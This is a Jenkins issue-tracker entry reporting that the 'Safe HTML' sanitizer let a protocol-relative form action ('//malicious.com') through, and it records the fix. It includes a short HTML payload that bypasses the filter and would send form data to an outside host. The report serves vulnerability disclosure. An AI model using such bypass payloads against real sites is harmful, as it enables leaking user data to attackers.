Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-31616

"Safe HTML" vulnerable to protocol-relative form action

    Details

    • Type: Bug
    • Status: Resolved (View Workflow)
    • Priority: Minor
    • Resolution: Fixed
    • Labels:
    • Environment:
    • Similar Issues:

      Description

      With "safe html" enabled for user text entry, a form with an external action URI is scrubbed. However, is it possible to write a form having a protocol-relative action URI that could be used to leak sensitive data to an external service.

      For example, this HTML is scrubbed correctly with the form action removed:

      <form action="https://malicious.com">
      <input type="submit">
      </form>

      The form action in this example is not scrubbed and it is possible for a user to create a form that directs to an external site:

      <form action="//malicious.com">
      <input type="submit">
      </form>

        Attachments

          Issue Links

            Activity

            jec Josh Cook created issue -
            danielbeck Daniel Beck made changes -
            Field Original Value New Value
            Component/s antisamy-markup-formatter-plugin [ 18424 ]
            Component/s security [ 15508 ]
            Priority Critical [ 2 ] Minor [ 4 ]
            danielbeck Daniel Beck made changes -
            Assignee Daniel Beck [ danielbeck ]
            danielbeck Daniel Beck made changes -
            Status Open [ 1 ] In Progress [ 3 ]
            danielbeck Daniel Beck made changes -
            Remote Link This issue links to "PR 4 (Web Link)" [ 13700 ]
            scm_issue_link SCM/JIRA link daemon made changes -
            Status In Progress [ 3 ] Resolved [ 5 ]
            Resolution Fixed [ 1 ]
            rtyler R. Tyler Croy made changes -
            Workflow JNJira [ 167048 ] JNJira + In-Review [ 198104 ]
            cloudbees CloudBees Inc. made changes -
            Remote Link This issue links to "CloudBees Internal OSS-769 (Web Link)" [ 18833 ]

              People

              • Assignee:
                danielbeck Daniel Beck
                Reporter:
                jec Josh Cook
              • Votes:
                0 Vote for this issue
                Watchers:
                3 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: